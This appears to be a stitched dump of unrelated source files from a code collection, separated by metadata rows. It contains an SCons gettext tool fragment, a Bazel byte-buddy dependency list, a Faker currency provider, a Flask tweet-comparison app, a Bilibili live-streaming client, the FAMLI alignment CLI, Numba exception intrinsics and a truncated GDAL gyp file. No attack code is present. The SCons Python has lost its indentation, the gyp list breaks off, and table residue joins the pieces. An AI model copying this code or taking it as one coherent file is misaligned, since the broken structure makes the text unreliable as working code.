linguas_files = env['LINGUAS_FILE']
# This should prevent from endless recursion.
env['LINGUAS_FILE'] = None
# We read only languages. Suffixes shall be added automatically.
linguas = _read_linguas_from_files(env, linguas_files)
if SCons.Util.is_List(source):
source.extend(linguas)
elif source is not None:
source = [source] + linguas
else:
source = linguas
    result = BuilderBase._execute(self, env, target, source, *args, **kw)
if linguas_files is not None:
env['LINGUAS_FILE'] = linguas_files
return result
#############################################################################
#############################################################################
def _create_mo_file_builder(env, **kw):
""" Create builder object for `MOFiles` builder """
import SCons.Action
  # FIXME: Which factory should be used for source? Ours or theirs?
kw['action'] = SCons.Action.Action('$MSGFMTCOM','$MSGFMTCOMSTR')
kw['suffix'] = '$MOSUFFIX'
kw['src_suffix'] = '$POSUFFIX'
kw['src_builder'] = '_POUpdateBuilder'
kw['single_source'] = True
return _MOFileBuilder(**kw)
#############################################################################
#############################################################################
def generate(env,**kw):
""" Generate `msgfmt` tool """
import SCons.Util
from SCons.Tool.GettextCommon import _detect_msgfmt
try:
env['MSGFMT'] = _detect_msgfmt(env)
  except Exception:
env['MSGFMT'] = 'msgfmt'
env.SetDefault(
MSGFMTFLAGS = [ SCons.Util.CLVar('-c') ],
MSGFMTCOM = '$MSGFMT $MSGFMTFLAGS -o $TARGET $SOURCE',
MSGFMTCOMSTR = '',
MOSUFFIX = ['.mo'],
POSUFFIX = ['.po']
)
env.Append( BUILDERS = { 'MOFiles' : _create_mo_file_builder(env) } )
#############################################################################
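#############################################################################
# Hedged usage sketch (not part of the original tool; the language names are
# illustrative). With this tool enabled, an SConscript would typically compile
# message catalogs like so:
#
#   env = Environment(tools=['default', 'msgfmt'])
#   env.MOFiles(['pl', 'de'])     # compiles pl.po and de.po into .mo files
#   env.MOFiles(LINGUAS_FILE=1)   # or read the language list from a LINGUAS file
#############################################################################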
#############################################################################
def exists(env):
""" Check if the tool exists """
from SCons.Tool.GettextCommon import _msgfmt_exists
try:
return _msgfmt_exists(env)
  except Exception:
return False
#############################################################################
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| 40.266055
| 77
| 0.61039
|
56b34c6f2087e4c8b73c29d61e9341467c992b3b
| 721
|
bzl
|
Python
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 186
|
2019-06-05T01:02:53.000Z
|
2022-03-31T10:44:19.000Z
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 25
|
2019-06-04T23:18:55.000Z
|
2021-09-22T03:44:25.000Z
|
third_party/net_bytebuddy.bzl
|
wix/exodus
|
dfb0c9713b07a8b6a49b548b7b543021e748d80b
|
[
"MIT"
] | 17
|
2019-06-04T18:45:19.000Z
|
2022-01-20T09:40:04.000Z
|
load("//:import_external.bzl", import_external = "safe_wix_scala_maven_import_external")
def dependencies():
import_external(
name = "net_bytebuddy_byte_buddy",
artifact = "net.bytebuddy:byte-buddy:1.8.15",
artifact_sha256 = "af32e420b1252c1eedef6232bd46fadafc02e0c609e086efd57a64781107a039",
srcjar_sha256 = "c18794f50d1dfc8fb57bfd886b566b05697da396022bcd63b5463a454d33c899",
)
import_external(
name = "net_bytebuddy_byte_buddy_agent",
artifact = "net.bytebuddy:byte-buddy-agent:1.8.15",
artifact_sha256 = "ca741271f1dc60557dd455f4d1f0363e8840612f6f08b5641342d84c07f14703",
srcjar_sha256 = "8d42067e2111943eb8b873320a394d2ef760b88d7fc235942c01d384924d289c",
)
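# Hedged usage sketch (the load label and alias are assumptions): a WORKSPACE
# or aggregating deps macro would typically pull these artifacts in with
#   load("//third_party:net_bytebuddy.bzl", net_bytebuddy_deps = "dependencies")
#   net_bytebuddy_deps()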
| 37.947368
| 91
| 0.78086
|
8dcb8043254041c3386b6c88079728ebcba592d2
| 316
|
py
|
Python
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 12,077
|
2015-01-01T18:30:07.000Z
|
2022-03-31T23:22:01.000Z
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 1,306
|
2015-01-03T05:18:55.000Z
|
2022-03-31T02:43:04.000Z
|
faker/providers/currency/fr_CA/__init__.py
|
mgorny/faker
|
b1176e01bf4d7f1aef408a4bb96a9e46188cc113
|
[
"MIT"
] | 1,855
|
2015-01-08T14:20:10.000Z
|
2022-03-25T17:23:32.000Z
|
from .. import Provider as CurrencyProvider
class Provider(CurrencyProvider):
price_formats = ["#,##", "%#,##", "%##,##", "%.###,##", "%#.###,##"]
def pricetag(self) -> str:
return (
self.numerify(self.random_element(self.price_formats))
+ "\N{no-break space}$"
)
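# Hedged usage sketch (standard Faker API; the sampled value is illustrative):
#   from faker import Faker
#   fake = Faker("fr_CA")
#   fake.pricetag()  # e.g. '8.914,50\xa0$' -- a price with a no-break space before '$'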
| 24.307692
| 72
| 0.512658
|
ac07a6587842b386c7260ef75b4fd04acf7b7d1b
| 2,644
|
py
|
Python
|
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
sub_dir/app.py
|
DrewRust/Twitoff2
|
3740e2800615074d5560f5046c0105d989d34cd7
|
[
"MIT"
] | null | null | null |
#### ---> runs the app in the terminal:
#### FLASK_APP=twitoff_sub_dir:APP flask run
#### running flask shell will give you an interactive python environment
#### ---> how to interact with your database
#### FLASK_APP=twitoff_sub_dir:APP flask shell
#### creates an interactive shell
#### ---> then type: dir()
#### ---> then type: from twitoff_sub_dir.db_model import db, User, Tweet
#### now you have access to User and Tweet
#### ---> then type: db.init_app(app)
#### (above will associate db model with flask app)
#### ---> exit() gets you out of the shell env
#### db.create_all() will create the twitoff.sqlite
from flask import Flask, render_template, request
#### import User class
from .db_model import db, User
from .twitter import add_user_tweepy
from .predict import predict_user
#### where the initial app code will live
#### define function called create app
def create_app():
'''Create and configure an instance of the Flask application'''
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:////Users/andrewrust/Twitoff/twitoff_sub_dir/twitoff.sqlite"
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db.init_app(app)
@app.route('/')
def root():
#### render a template
return render_template('base.html', title='Home', users=User.query.all())
# return "Welcome to Twitoff!"
@app.route('/user', methods=['POST'])
@app.route('/user/<name>', methods=['GET'])
def user(name=None, message=''):
name = name or request.values['user_name']
try:
if request.method == 'POST':
add_user_tweepy(name)
message = "User {} successfully added!".format(name)
tweets = User.query.filter(User.username == name).one().tweet
except Exception as e:
message = "Error adding {}: {}".format(name, e)
tweets = []
return render_template('user.html', title=name, tweets=tweets, message=message)
@app.route('/compare', methods=['POST'])
def compare(message=''):
user1 = request.values['user1']
user2 = request.values['user2']
tweet_text = request.values['tweet_text']
if user1 == user2:
message = 'Cannot compare a user to themselves'
else:
prediction = predict_user(user1, user2, tweet_text)
message = '"{}" is more likely to be said by {} than {}'.format(
tweet_text, user1 if prediction else user2, user2 if prediction else user1
)
return render_template('prediction.html', title='Prediction', message=message)
return app
| 38.318841
| 112
| 0.638805
|
5c74c691d6193da6ec1a0af8cccf4865c4fc4b0e
| 4,851
|
py
|
Python
|
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
utils/blivex.py
|
liu246542/push2live
|
996d0bd71028ce1b2c97e896106cab9064fdf64e
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.7
# -*- coding: utf-8 -*-
import requests
import time
class Bilibili:
def __init__(self):
self._session = requests.Session()
self.get_cookies = lambda: self._session.cookies.get_dict(domain=".bilibili.com")
self.get_uid = lambda: self.get_cookies().get("DedeUserID", "")
self.info = {
'ban': False,
'coins': 0,
'face': "",
'level': 0,
'nickname': "",
'room_id': "",
'live_status': False
}
self.headers = {
"accept": "application/json, text/plain, */*",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"referrer": "https://link.bilibili.com/p/center/index",
"referrerPolicy": "no-referrer-when-downgrade"
}
@staticmethod
def _log(message):
print(f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}] {message}")
def _requests(self, method, url, decode_level=2, retry=0, timeout=10, **kwargs):
if method in ["get", "post"]:
for _ in range(retry + 1):
try:
response = getattr(self._session, method)(url, timeout=timeout, **kwargs)
return response.json() if decode_level == 2 else response.content if decode_level == 1 else response
                except Exception:
pass
return None
    # Log in with a cookie file
def login_with_cookie(self, fcookie):
import json
with open(fcookie) as f:
tempCookie = json.load(f)
for k in tempCookie.keys():
self._session.cookies.set(k, tempCookie[k], domain=".bilibili.com")
if self.get_user_info():
self._log("登录成功")
return True
return False
    # Fetch user info
def get_user_info(self):
url = f"https://api.bilibili.com/x/space/acc/info?mid={self.get_uid()}&jsonp=jsonp"
headers = {
'Host': "api.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
self.info['ban'] = bool(response['data']['silence'])
self.info['coins'] = response['data']['coins']
self.info['face'] = response['data']['face']
self.info['level'] = response['data']['level']
self.info['nickname'] = response['data']['name']
self.info['room_id'] = response['data']['live_room']['roomid']
self.info['live_status'] = bool(response['data']['live_room']['liveStatus'])
# self.room_info = self._requests("get", "https://api.live.bilibili.com/xlive/app-blink/v1/room/GetInfo?platform=pc").get("data")
self._log(f"{self.info['nickname']}(UID={self.get_uid()}), Lv.{self.info['level']}, 拥有{self.info['coins']}枚硬币, 账号{'状态正常' if not self.info['ban'] else '被封禁'}, 直播间ID={self.info['room_id']}, {'正在直播' if self.info['live_status'] else '停播状态'}")
return True
else:
self._log("用户信息获取失败")
return False
def start_live(self):
url = "https://api.live.bilibili.com/room/v1/Room/startLive"
payload = {
'room_id': self.info['room_id'],
'platform': 'pc',
            'area_v2': 33,  # can be set manually, e.g. 33: cinema & music, 376: study - humanities & social sciences
'csrf_token': self._session.cookies['bili_jct'],
'csrf': self._session.cookies['bili_jct'],
}
response = self._requests("post", url, data=payload, headers=self.headers).get("data")
self.rtmp_addr = response.get("rtmp").get("addr") + response.get("rtmp").get("code")
if not self.rtmp_addr:
self._log("开启直播间失败")
return False
self._log("开启直播间成功,串流地址为:" + self.rtmp_addr)
return True
def get_rtmp(self):
url = "https://api.live.bilibili.com/xlive/app-blink/v1/live/getWebUpStreamAddr?platform=pc"
response = self._requests("get", url).get("data").get("addr")
self.rtmp_addr = response.get("addr") + response.get("code")
return self.rtmp_addr
def stop_live(self):
url = "https://api.live.bilibili.com/room/v1/Room/stopLive"
payload = {
'room_id': self.info['room_id'],
'platform': 'pc',
'csrf_token': self._session.cookies['bili_jct'],
'csrf': self._session.cookies['bili_jct'],
}
response = self._requests("post", url, data=payload, headers=self.headers)
self._log("正在关闭直播间")
return True
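# Hedged usage sketch (the cookie file name is an assumption; the JSON file is
# expected to hold bilibili.com cookies, including 'DedeUserID' and 'bili_jct'):
#   b = Bilibili()
#   if b.login_with_cookie("cookies.json"):
#       b.start_live()   # logs the RTMP push address (also kept in b.rtmp_addr)
#       ...              # push the stream with an external encoder such as OBS
#       b.stop_live()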
| 42.552632
| 250
| 0.5537
|
fc71cbfb64a991b1f6ad593db3e2349014f254fd
| 15,143
|
py
|
Python
|
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
famli/run_famli.py
|
apaytuvi/FAMLI
|
b95f4e3b2be1d46b85d063f8d67f84e23377d73b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""Wrapper script to run FAMLI on one or more FASTQ files."""
import os
import sys
import uuid
import time
import gzip
import json
import shutil
import logging
import argparse
from famli.exec_helpers import run_cmds
from famli.exec_helpers import align_reads
from famli.exec_helpers import return_results
from famli.exec_helpers import exit_and_clean_up
from famli.exec_helpers import get_reference_database
from famli.fastq_helpers import get_reads_from_url
from famli.fastq_helpers import set_up_sra_cache_folder
from famli.fastq_helpers import count_fastq_reads
from famli.fastq_helpers import combine_fastqs
from famli.famli_helpers import parse_alignment
class FAMLI:
def __init__(self):
parser = argparse.ArgumentParser(description="""
Two options for running FAMLI:
(1) Align a set of WGS reads - align against a reference database
with DIAMOND, process those alignments with FAMLI, and save the
results; or (2) Filter a set of existing alignments with FAMLI and
save the results.""")
parser.add_argument("command", help="""Command to run: align or filter. Invoke
famli.py <command> -h for further details""")
if len(sys.argv) < 2:
parser.print_help()
else:
args = parser.parse_args(sys.argv[1:2])
# Run the command that was specified
if args.command == "align":
self.align()
elif args.command == "filter":
self.filter()
else:
parser.print_help()
print("Unrecognized command")
def align(self):
"""Align a set of reads with DIAMOND and run FAMLI."""
parser = argparse.ArgumentParser(
description="""Align a set of reads with DIAMOND, filter alignments with FAMLI,
and return the results""")
parser.add_argument("--input",
type=str,
required=True,
help="""Location for input file(s). Combine multiple files with +.
(Supported: sra://, s3://, or ftp://).""")
parser.add_argument("--sample-name",
type=str,
required=True,
help="""Name of sample, sets output filename.""")
parser.add_argument("--ref-db",
type=str,
required=True,
help="""Folder containing reference database.
(Supported: s3://, ftp://, or local path).
""")
parser.add_argument("--output-folder",
type=str,
required=True,
help="""Folder to place results.
(Supported: s3://, or local path).""")
parser.add_argument("--min-score",
type=float,
default=20,
help="Minimum alignment score to report.")
parser.add_argument("--blocks",
type=int,
default=5,
help="""Number of blocks used when aligning.
Value relates to the amount of memory used.
Roughly 6Gb RAM used by DIAMOND per block.
""")
parser.add_argument("--query-gencode",
type=int,
default=11,
help="Genetic code used to translate nucleotides.")
parser.add_argument("--threads",
type=int,
default=16,
help="Number of threads to use aligning.")
parser.add_argument("--min-qual",
type=int,
default=None,
help="Trim reads to a minimum Q score.")
parser.add_argument("--temp-folder",
type=str,
default='/share',
help="Folder used for temporary files.")
parser.add_argument("--batchsize",
type=int,
help="""Number of reads to process at a time.""")
args = parser.parse_args(sys.argv[2:])
# Make sure that there are no commas or whitespaces in the input
input_str = args.input
assert ' ' not in input_str, input_str
assert ',' not in input_str, input_str
# Make a temporary folder for all files to be placed in
temp_folder = os.path.join(args.temp_folder, str(uuid.uuid4())[:8])
assert os.path.exists(temp_folder) is False
os.mkdir(temp_folder)
# Set up logging
log_fp = os.path.join(temp_folder, "log.txt")
logFormatter = logging.Formatter(
'%(asctime)s %(levelname)-8s [FAMLI] %(message)s'
)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
# Write to file
fileHandler = logging.FileHandler(log_fp)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
# Also write to STDOUT
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
# Check to see if DIAMOND is available
logging.info("Checking for a working copy of DIAMOND")
run_cmds(["diamond", "--version"])
# Get the reference database
try:
db_fp = get_reference_database(
args.ref_db,
temp_folder
)
        except Exception:
exit_and_clean_up(temp_folder)
# Set up the NCBI fastq-dump cache folder within the temp folder
set_up_sra_cache_folder(temp_folder)
logging.info("Reference database: " + db_fp)
# Align the input data and calculate the overall abundance
# Keep track of the time elapsed to process this sample
start_time = time.time()
logging.info("Processing input argument: " + input_str)
# Multiple input reads may be separated with a '+'
input_str = input_str.split("+")
# Make sure that they are all unique arguments
assert len(input_str) == len(set(input_str)), "Duplicate arguments"
# Make sure that the filenames are also all unique
assert len(input_str) == len(set([
s.split('/')[-1] for s in input_str
])), "Duplicate filenames"
# Capture each command in a try statement
# Get the input reads
read_fps = []
for s in input_str:
logging.info("Fetching {}".format(s))
try:
read_fps.append(get_reads_from_url(
s, temp_folder, min_qual=args.min_qual))
            except Exception:
exit_and_clean_up(temp_folder)
# Combine the files into a single FASTQ
read_fp = os.path.join(temp_folder, "input.fastq")
combine_fastqs(read_fps, read_fp)
# Run the alignment
try:
align_fp = align_reads(
read_fp, # FASTQ file path
db_fp, # Local path to DB
temp_folder, # Folder for results
query_gencode=args.query_gencode,
threads=args.threads,
min_score=args.min_score,
blocks=args.blocks,
)
        except Exception:
exit_and_clean_up(temp_folder)
# Process the alignments, reassigning multi-mapped reads
try:
with open(align_fp, "rt") as align_handle:
aligned_reads, abund = parse_alignment(
align_handle,
batchsize=args.batchsize,
)
        except Exception:
exit_and_clean_up(temp_folder)
# Calculate the number of deduplicated reads
deduplicated_reads = sum([d["nreads"] for d in abund])
# Name the output file based on the input file
# Ultimately adding ".json.gz" to the input file name
if args.sample_name is not None:
output_prefix = args.sample_name
else:
output_prefix = input_str[0].split("/")[-1]
logging.info("Using sample name {} for output prefix".format(
output_prefix))
# Count the total number of reads
logging.info("Counting the total number of reads")
n_reads = count_fastq_reads(read_fp)
logging.info("Reads in input file: {:,}".format(n_reads))
# Read in the logs
logging.info("Reading in the logs")
        with open(log_fp, 'rt') as log_handle:
            logs = log_handle.readlines()
# Wrap up all of the results into a single JSON
# and write it to the output folder
output = {
"input_path": "+".join(input_str),
"input": output_prefix,
"sample": args.sample_name,
"output_folder": args.output_folder,
"logs": logs,
"ref_db": db_fp,
"ref_db_url": args.ref_db,
"results": abund,
"total_reads": n_reads,
"aligned_reads": aligned_reads,
"deduplicated_reads": deduplicated_reads,
"time_elapsed": time.time() - start_time,
"params": {
"batchsize": args.batchsize,
"min_score": args.min_score,
"blocks": args.blocks,
"query_gencode": args.query_gencode,
"threads": args.threads,
"min_qual": args.min_qual
}
}
return_results(
output, output_prefix, args.output_folder, temp_folder
)
# Delete any files that were created for this sample
logging.info("Removing temporary folder: " + temp_folder)
shutil.rmtree(temp_folder)
# Stop logging
logging.info("Done")
logging.shutdown()
def filter(self):
"""Filter a set of alignments with FAMLI."""
parser = argparse.ArgumentParser(
description="""Filter a set of existing alignments in tabular
format with FAMLI""")
parser.add_argument("--input",
type=str,
help="Location for input alignement file.")
parser.add_argument("--output",
type=str,
help="Location for output JSON file.")
parser.add_argument("--threads",
type=int,
help="""Number of processors to use.""",
default=4)
parser.add_argument("--logfile",
type=str,
help="""(Optional) Write log to this file.""")
parser.add_argument("--batchsize",
type=int,
help="""Number of reads to process at a time.""")
parser.add_argument("--qseqid-ix",
default=0,
type=int,
help="""Alignment column for query sequence ID.
(0-indexed column ix)""")
parser.add_argument("--sseqid-ix",
default=1,
type=int,
help="""Alignment column for subject sequence ID.
(0-indexed column ix)""")
parser.add_argument("--sstart-ix",
default=8,
type=int,
help="""Alignment column for subject start position.
(0-indexed column ix, 1-indexed start position)""")
parser.add_argument("--send-ix",
default=9,
type=int,
help="""Alignment column for subject end position.
(0-indexed column ix, 1-indexed end position)""")
parser.add_argument("--bitscore-ix",
default=11,
type=int,
help="""Alignment column for alignment bitscore.
(0-indexed column ix)""")
parser.add_argument("--slen-ix",
default=13,
type=int,
help="""Alignment column for subject length.
(0-indexed column ix)""")
parser.add_argument("--sd-mean-cutoff",
default=1.0,
type=float,
help="""Threshold for filtering max SD / MEAN""")
parser.add_argument("--strim-5",
default=18,
type=int,
help="""Amount to trim from 5' end of subject""")
parser.add_argument("--strim-3",
default=18,
type=int,
help="""Amount to trim from 3' end of subject""")
args = parser.parse_args(sys.argv[2:])
start_time = time.time()
assert os.path.exists(args.input)
# Set up logging
logFormatter = logging.Formatter(
'%(asctime)s %(levelname)-8s [FAMLI parse] %(message)s'
)
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.INFO)
if args.logfile:
# Write to file
fileHandler = logging.FileHandler(args.logfile)
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
# Write to STDOUT
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
if args.input.endswith(".gz"):
f = gzip.open(args.input, "rt")
else:
f = open(args.input, "rt")
aligned_reads, output = parse_alignment(
f,
QSEQID_i=args.qseqid_ix,
SSEQID_i=args.sseqid_ix,
SSTART_i=args.sstart_ix,
SEND_i=args.send_ix,
BITSCORE_i=args.bitscore_ix,
SLEN_i=args.slen_ix,
SD_MEAN_CUTOFF=args.sd_mean_cutoff,
STRIM_5=args.strim_5,
STRIM_3=args.strim_3,
threads=args.threads,
batchsize=args.batchsize,
)
f.close()
if args.output:
with open(args.output, "wt") as fo:
json.dump(output, fo, indent=4)
elapsed = round(time.time() - start_time, 2)
logging.info("Time elapsed: {:,}".format(elapsed))
def main():
"""Entrypoint for main script."""
FAMLI()
if __name__ == "__main__":
# Run FAMLI
FAMLI()
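# Hedged CLI sketch (flag names are taken from the argparse definitions above;
# the `famli` entrypoint name, bucket paths and file names are placeholders):
#   famli align --input s3://bucket/reads.fastq.gz --sample-name sampleA \
#       --ref-db s3://bucket/refdb/ --output-folder s3://bucket/results/
#   famli filter --input alignments.tsv.gz --output sampleA.json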
| 38.531807
| 95
| 0.517929
|
0a488a211b9e9f8e712cdf4b58f9a18bce9b0e52
| 1,611
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
BadDevCode/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 1,738
|
2017-09-21T10:59:12.000Z
|
2022-03-31T21:05:46.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
olivier-be/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 427
|
2017-09-29T22:54:36.000Z
|
2022-02-15T19:26:50.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
olivier-be/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 671
|
2017-09-21T08:04:01.000Z
|
2022-03-29T14:30:07.000Z
|
"""
Exception handling intrinsics.
"""
from numba import types, cgutils, errors
from numba.extending import intrinsic
@intrinsic
def exception_check(typingctx):
"""An intrinsic to check if an exception is raised
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
return nrt.eh_check(builder)
restype = types.boolean
return restype(), codegen
@intrinsic
def mark_try_block(typingctx):
"""An intrinsic to mark the start of a *try* block.
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
nrt.eh_try(builder)
return context.get_dummy_value()
restype = types.none
return restype(), codegen
@intrinsic
def end_try_block(typingctx):
"""An intrinsic to mark the end of a *try* block.
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
nrt.eh_end_try(builder)
return context.get_dummy_value()
restype = types.none
return restype(), codegen
@intrinsic
def exception_match(typingctx, exc_value, exc_class):
"""Basically do ``isinstance(exc_value, exc_class)`` for exception objects.
Used in ``except Exception:`` syntax.
"""
# Check for our limitation
if exc_class.exc_class is not Exception:
msg = "Exception matching is limited to {}"
raise errors.UnsupportedError(msg.format(Exception))
def codegen(context, builder, signature, args):
# Intentionally always True.
return cgutils.true_bit
restype = types.boolean
return restype(exc_value, exc_class), codegen
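# Hedged usage note (illustrative only; assumes numba.njit): these intrinsics
# back Numba's lowering of try/except in nopython mode. Because exception_match
# above only accepts Exception itself, jitted code can use a bare
# ``except Exception:`` clause, while a narrower match such as
# ``except ValueError:`` raises errors.UnsupportedError at compile time:
#   from numba import njit
#   @njit
#   def safe_div(a, b):
#       try:
#           return a / b
#       except Exception:  # the only supported exception match
#           return 0.0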
| 25.571429
| 79
| 0.67784
|
b2addcce044962484ce677134950ac4027085fb2
| 12,587
|
gyp
|
Python
|
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
{
"includes": [
"./common.gypi",
"./libgdal_formats.gypi"
],
"targets": [
{
"target_name": "libgdal",
"type": "static_library",
"sources": [
"gdal/apps/gdal_translate_lib.cpp",
"gdal/apps/ogr2ogr_lib.cpp",
"gdal/apps/gdalbuildvrt_lib.cpp",
"gdal/apps/commonutils.cpp",
"gdal/frmts/gdalallregister.cpp",
"gdal/ogr/osr_cs_wkt.c",
"gdal/ogr/osr_cs_wkt_parser.c",
"gdal/ogr/gml2ogrgeometry.cpp",
"gdal/ogr/ogr2gmlgeometry.cpp",
"gdal/ogr/ogr_api.cpp",
"gdal/ogr/ogr_expat.cpp",
"gdal/ogr/ogr_fromepsg.cpp",
"gdal/ogr/ogr_geocoding.cpp",
"gdal/ogr/ogr_opt.cpp",
"gdal/ogr/ogr_srs_dict.cpp",
"gdal/ogr/ogr_srs_erm.cpp",
"gdal/ogr/ogr_srs_esri.cpp",
"gdal/ogr/ogr_srs_ozi.cpp",
"gdal/ogr/ogr_srs_panorama.cpp",
"gdal/ogr/ogr_srs_pci.cpp",
"gdal/ogr/ogr_srs_proj4.cpp",
"gdal/ogr/ogr_srs_usgs.cpp",
"gdal/ogr/ogr_srs_validate.cpp",
"gdal/ogr/ogr_srs_xml.cpp",
"gdal/ogr/ogr_srsnode.cpp",
"gdal/ogr/ograssemblepolygon.cpp",
"gdal/ogr/ogrct.cpp",
"gdal/ogr/ogrcurve.cpp",
"gdal/ogr/ogrfeature.cpp",
"gdal/ogr/ogrfeaturedefn.cpp",
"gdal/ogr/ogrfeaturequery.cpp",
"gdal/ogr/ogrfeaturestyle.cpp",
"gdal/ogr/ogrfielddefn.cpp",
"gdal/ogr/ogrgeomediageometry.cpp",
"gdal/ogr/ogrgeometry.cpp",
"gdal/ogr/ogrgeometrycollection.cpp",
"gdal/ogr/ogrgeometryfactory.cpp",
"gdal/ogr/ogrgeomfielddefn.cpp",
"gdal/ogr/ogrlinearring.cpp",
"gdal/ogr/ogrlinestring.cpp",
"gdal/ogr/ogrmultilinestring.cpp",
"gdal/ogr/ogrmultipoint.cpp",
"gdal/ogr/ogrmultipolygon.cpp",
"gdal/ogr/ogrpgeogeometry.cpp",
"gdal/ogr/ogrpoint.cpp",
"gdal/ogr/ogrpolygon.cpp",
"gdal/ogr/ogrspatialreference.cpp",
"gdal/ogr/ogrsurface.cpp",
"gdal/ogr/ogrutils.cpp",
"gdal/ogr/swq.cpp",
"gdal/ogr/swq_expr_node.cpp",
"gdal/ogr/swq_op_general.cpp",
"gdal/ogr/swq_op_registrar.cpp",
"gdal/ogr/swq_parser.cpp",
"gdal/ogr/swq_select.cpp",
"gdal/ogr/ograpispy.cpp",
"gdal/ogr/ogrcircularstring.cpp",
"gdal/ogr/ogrcompoundcurve.cpp",
"gdal/ogr/ogrcurvecollection.cpp",
"gdal/ogr/ogrcurvepolygon.cpp",
"gdal/ogr/ogrmulticurve.cpp",
"gdal/ogr/ogrmultisurface.cpp",
"gdal/ogr/ogr_geo_utils.cpp",
"gdal/ogr/ogr_xerces.cpp",
"gdal/ogr/ogrpolyhedralsurface.cpp",
"gdal/ogr/ogrtriangle.cpp",
"gdal/ogr/ogrtriangulatedsurface.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogreditablelayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogremulatedtransaction.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_attrind.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_gensql.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_miattrind.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrdatasource.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayerdecorator.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayerpool.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrmutexeddatasource.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrmutexedlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrregisterall.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrsfdriver.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrsfdriverregistrar.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrunionlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrwarpedlayer.cpp",
"gdal/alg/gdalpansharpen.cpp",
"gdal/alg/delaunay.c",
"gdal/alg/contour.cpp",
"gdal/alg/polygonize.cpp",
"gdal/alg/gdal_octave.cpp",
"gdal/alg/gdal_rpc.cpp",
"gdal/alg/gdal_simplesurf.cpp",
"gdal/alg/gdal_tps.cpp",
"gdal/alg/gdalchecksum.cpp",
"gdal/alg/gdalcutline.cpp",
"gdal/alg/gdaldither.cpp",
"gdal/alg/gdalgeoloc.cpp",
"gdal/alg/gdalgrid.cpp",
"gdal/alg/gdalgridsse.cpp",
"gdal/alg/gdalgridavx.cpp",
"gdal/alg/gdalmatching.cpp",
